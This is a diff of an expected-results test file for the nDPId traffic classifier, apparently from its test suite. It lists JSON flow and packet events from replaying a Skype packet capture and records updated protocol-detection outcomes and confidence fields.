-00565{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3186,"source":"skype.pcap","alias":"nDPId-test","flow_id":290,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969789851,"flow_last_seen":1431969789851,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1431969789851,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"224.0.0.251","l4_proto":2,"ndpi": {"proto":"IGMP","breed":"Acceptable","category":"Network"}}
+00591{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3186,"source":"skype.pcap","alias":"nDPId-test","flow_id":290,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969789851,"flow_last_seen":1431969789851,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1431969789851,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"224.0.0.251","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3187,"source":"skype.pcap","alias":"nDPId-test","flow_id":289,"flow_packet_id":2,"flow_last_seen":1431969789919,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1431969789919,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8evFAAHMGmcJOyuJzwKgBInGDw+BU8I6O2EOgJ6ASIADRMgAAAgQFrAEDAwgEAggKAlDJrD4kyEw="}
 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3188,"source":"skype.pcap","alias":"nDPId-test","flow_id":289,"flow_packet_id":3,"flow_last_seen":1431969789919,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1431969789919,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0W4RAAEAG7DfAqAEiTsric8PgcYPYQ6AnVPCOj4AQECwPdQAAAQEICj4kyKMCUMms"}
 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3221,"source":"skype.pcap","alias":"nDPId-test","flow_id":291,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969791166,"flow_last_seen":1431969791166,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431969791166,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.53.51","src_port":50145,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3221,"source":"skype.pcap","alias":"nDPId-test","flow_id":291,"flow_packet_id":1,"flow_last_seen":1431969791166,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431969791166,"pkt":"0NQSxnP1PBXCt3IOCABFAABA8JJAAEAGte\/AqAEinTg1M8PhMD4fbaHhAAAAALAC\/\/\/hugAAAgQFtAEDAwUBAQgKPiTNeQAAAAAEAgAA"}
-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3224,"source":"skype.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969657367,"flow_last_seen":1431969678270,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":231,"flow_avg_l4_payload_len":13,"midstream":0,"ts_msec":1431969792168,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.170","src_port":50033,"dst_port":40015,"l4_proto":"tcp","ndpi": {"proto":"Skype_Teams","breed":"Acceptable","category":"VoIP"}}
+00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3224,"source":"skype.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969657367,"flow_last_seen":1431969678270,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":231,"flow_avg_l4_payload_len":13,"midstream":0,"ts_msec":1431969792168,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.170","src_port":50033,"dst_port":40015,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3224,"source":"skype.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969657367,"flow_last_seen":1431969678270,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":231,"flow_avg_l4_payload_len":13,"midstream":0,"ts_msec":1431969792168,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.170","src_port":50033,"dst_port":40015,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3224,"source":"skype.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969657367,"flow_last_seen":1431969676525,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":270,"flow_avg_l4_payload_len":15,"midstream":0,"ts_msec":1431969792168,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.140","src_port":50034,"dst_port":40033,"l4_proto":"tcp","ndpi": {"proto":"Skype_Teams","breed":"Acceptable","category":"VoIP"}}
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3224,"source":"skype.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969657367,"flow_last_seen":1431969676525,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":270,"flow_avg_l4_payload_len":15,"midstream":0,"ts_msec":1431969792168,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.140","src_port":50034,"dst_port":40033,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00578{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3224,"source":"skype.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969657367,"flow_last_seen":1431969676525,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":270,"flow_avg_l4_payload_len":15,"midstream":0,"ts_msec":1431969792168,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.140","src_port":50034,"dst_port":40033,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00598{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3224,"source":"skype.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1431969675567,"flow_last_seen":1431969675716,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1431969792168,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.172.100.36","src_port":50024,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Apple","breed":"Safe","category":"Web"}}
+00632{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3224,"source":"skype.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1431969675567,"flow_last_seen":1431969675716,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1431969792168,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.172.100.36","src_port":50024,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}}
 00571{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3224,"source":"skype.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1431969675567,"flow_last_seen":1431969675716,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1431969792168,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.172.100.36","src_port":50024,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00616{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3224,"source":"skype.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969658979,"flow_last_seen":1431969678254,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":264,"flow_avg_l4_payload_len":17,"midstream":0,"ts_msec":1431969792168,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.140","src_port":50038,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"}}
+00633{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3224,"source":"skype.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969658979,"flow_last_seen":1431969678254,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":264,"flow_avg_l4_payload_len":17,"midstream":0,"ts_msec":1431969792168,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.140","src_port":50038,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00576{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3224,"source":"skype.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969658979,"flow_last_seen":1431969678254,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":264,"flow_avg_l4_payload_len":17,"midstream":0,"ts_msec":1431969792168,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.140","src_port":50038,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3224,"source":"skype.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969658978,"flow_last_seen":1431969677390,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":396,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969792168,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.44","src_port":50036,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"}}
+00631{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3224,"source":"skype.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969658978,"flow_last_seen":1431969677390,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":396,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969792168,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.44","src_port":50036,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3224,"source":"skype.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969658978,"flow_last_seen":1431969677390,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":396,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969792168,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.44","src_port":50036,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00653{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3224,"source":"skype.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431969698743,"flow_last_seen":1431969698797,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1431969792168,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63321,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}}
-00665{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3224,"source":"skype.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969692507,"flow_last_seen":1431969692507,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431969792168,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00679{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3224,"source":"skype.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431969698743,"flow_last_seen":1431969698797,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1431969792168,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63321,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}}
+00691{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3224,"source":"skype.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969692507,"flow_last_seen":1431969692507,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431969792168,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3224,"source":"skype.pcap","alias":"nDPId-test","flow_id":291,"flow_packet_id":2,"flow_last_seen":1431969792168,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431969792168,"pkt":"0NQSxnP1PBXCt3IOCABFAABA6r1AAEAGu8TAqAEinTg1M8PhMD4fbaHhAAAAALAC\/\/\/d0gAAAgQFtAEDAwUBAQgKPiTRYQAAAAAEAgAA"}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3227,"source":"skype.pcap","alias":"nDPId-test","flow_id":292,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969792778,"flow_last_seen":1431969792778,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431969792778,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.53.51","src_port":50146,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3227,"source":"skype.pcap","alias":"nDPId-test","flow_id":292,"flow_packet_id":1,"flow_last_seen":1431969792778,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431969792778,"pkt":"0NQSxnP1PBXCt3IOCABFAABACyhAAEAGm1rAqAEinTg1M8PiAbsrN9oxAAAAALAC\/\/\/F2QAAAgQFtAEDAwUBAQgKPiTTwgAAAAAEAgAA"}
@@ -1259,52 +1258,52 @@
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3231,"source":"skype.pcap","alias":"nDPId-test","flow_id":292,"flow_packet_id":2,"flow_last_seen":1431969793781,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431969793781,"pkt":"0NQSxnP1PBXCt3IOCABFAABAXRdAAEAGSWvAqAEinTg1M8PiAbsrN9oxAAAAALAC\/\/\/B8AAAAgQFtAEDAwUBAQgKPiTXqwAAAAAEAgAA"}
 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3232,"source":"skype.pcap","alias":"nDPId-test","flow_id":293,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969793871,"flow_last_seen":1431969793871,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431969793871,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":55893,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3232,"source":"skype.pcap","alias":"nDPId-test","flow_id":293,"flow_packet_id":1,"flow_last_seen":1431969793871,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"ts_msec":1431969793871,"pkt":"0NQSxnP1PBXCt3IOCABFAAA68cwAAEARBXPAqAEiwKgBAdpVADUAJgS+DhkBAAABAAAAAAAAAnVpBXNreXBlA2NvbQAAAQAB"}
-00740{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3232,"source":"skype.pcap","alias":"nDPId-test","flow_id":293,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969793871,"flow_last_seen":1431969793871,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431969793871,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":55893,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"ui.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3232,"source":"skype.pcap","alias":"nDPId-test","flow_id":293,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969793871,"flow_last_seen":1431969793871,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431969793871,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":55893,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"ui.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3234,"source":"skype.pcap","alias":"nDPId-test","flow_id":292,"flow_packet_id":3,"flow_last_seen":1431969794784,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431969794784,"pkt":"0NQSxnP1PBXCt3IOCABFAABA\/CFAAEAGqmDAqAEinTg1M8PiAbsrN9oxAAAAALAC\/\/++BwAAAgQFtAEDAwUBAQgKPiTblAAAAAAEAgAA"}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3236,"source":"skype.pcap","alias":"nDPId-test","flow_id":293,"flow_packet_id":2,"flow_last_seen":1431969794907,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"ts_msec":1431969794907,"pkt":"0NQSxnP1PBXCt3IOCABFAAA6ITcAAEAR1gjAqAEiwKgBAdpVADUAJgS+DhkBAAABAAAAAAAAAnVpBXNreXBlA2NvbQAAAQAB"}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3239,"source":"skype.pcap","alias":"nDPId-test","flow_id":293,"flow_packet_id":3,"flow_last_seen":1431969796001,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"ts_msec":1431969796001,"pkt":"0NQSxnP1PBXCt3IOCABFAAA6focAAEAReLjAqAEiwKgBAdpVADUAJgS+DhkBAAABAAAAAAAAAnVpBXNreXBlA2NvbQAAAQAB"}
-00616{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3251,"source":"skype.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969665416,"flow_last_seen":1431969685656,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":106,"flow_tot_l4_payload_len":231,"flow_avg_l4_payload_len":15,"midstream":0,"ts_msec":1431969802183,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.150","src_port":50046,"dst_port":40011,"l4_proto":"tcp","ndpi": {"proto":"Skype_Teams","breed":"Acceptable","category":"VoIP"}}
+00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3251,"source":"skype.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969665416,"flow_last_seen":1431969685656,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":106,"flow_tot_l4_payload_len":231,"flow_avg_l4_payload_len":15,"midstream":0,"ts_msec":1431969802183,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.150","src_port":50046,"dst_port":40011,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00580{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3251,"source":"skype.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969665416,"flow_last_seen":1431969685656,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":106,"flow_tot_l4_payload_len":231,"flow_avg_l4_payload_len":15,"midstream":0,"ts_msec":1431969802183,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.150","src_port":50046,"dst_port":40011,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00615{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3251,"source":"skype.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969667439,"flow_last_seen":1431969689428,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":13,"midstream":0,"ts_msec":1431969802183,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.166","src_port":50049,"dst_port":40021,"l4_proto":"tcp","ndpi": {"proto":"Skype_Teams","breed":"Acceptable","category":"VoIP"}}
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3251,"source":"skype.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969667439,"flow_last_seen":1431969689428,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":13,"midstream":0,"ts_msec":1431969802183,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.166","src_port":50049,"dst_port":40021,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3251,"source":"skype.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969667439,"flow_last_seen":1431969689428,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":13,"midstream":0,"ts_msec":1431969802183,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.166","src_port":50049,"dst_port":40021,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3251,"source":"skype.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969663377,"flow_last_seen":1431969687753,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":13,"midstream":0,"ts_msec":1431969802183,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.167","src_port":50044,"dst_port":40031,"l4_proto":"tcp","ndpi": {"proto":"Skype_Teams","breed":"Acceptable","category":"VoIP"}}
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3251,"source":"skype.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969663377,"flow_last_seen":1431969687753,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":13,"midstream":0,"ts_msec":1431969802183,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.167","src_port":50044,"dst_port":40031,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00578{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3251,"source":"skype.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969663377,"flow_last_seen":1431969687753,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":13,"midstream":0,"ts_msec":1431969802183,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.167","src_port":50044,"dst_port":40031,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3251,"source":"skype.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969658376,"flow_last_seen":1431969684569,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":9,"midstream":0,"ts_msec":1431969802183,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.175","src_port":50035,"dst_port":40021,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
